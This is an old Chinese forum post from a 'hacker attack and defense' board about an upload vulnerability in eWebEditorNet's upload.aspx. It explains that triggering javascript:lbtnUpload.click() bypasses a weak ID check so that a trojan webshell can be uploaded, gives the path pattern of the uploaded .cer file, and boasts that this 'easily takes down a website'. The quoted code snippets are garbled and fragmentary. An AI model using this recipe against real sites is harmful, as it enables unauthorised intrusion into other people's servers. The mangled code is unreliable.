服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务
设为首页收藏本站
开启辅助访问 切换到宽版

运维之家

 找回密码
 注册
搜索
运维之家»技术论坛 服务器网管区 黑客攻防 eWebEditorNet 漏洞 upload.aspx
返回列表 发新帖
查看: 4555|回复: 0

eWebEditorNet 漏洞 upload.aspx

[复制链接]
dirtysea 发表于 2009-8-15 01:07:47 | 显示全部楼层 |阅读模式
eWebEditorNet 主要是一个upload.aspx文件存在上传漏洞。

原理:

代码
  • <form id="post" encType="server">
  • "uploadfile" style="file" size="uploadfile" runat=
  • "lbtnUpload" runat=
  • "JavaScript">

复制代码 【注:此代码当前贴于 http://bbs.xdadmin.com
只是简单的对ID进行验证
只要构造javascript:lbtnUpload.click();满足条件
达到上传木马的效果
成功以后查看源代码

代码
  • a "lbtnUpload" "javascript:__doPostBack('lbtnUpload','')"</>script 'javascript'</>

复制代码 【注:此代码当前贴于 http://bbs.xdadmin.com
木马的具体地址为
/eWebEditorNet/UploadFile/200801141044412198.cer
这样就轻松的拿下了一个网站。
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-4-19 06:28 , Processed in 0.180547 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表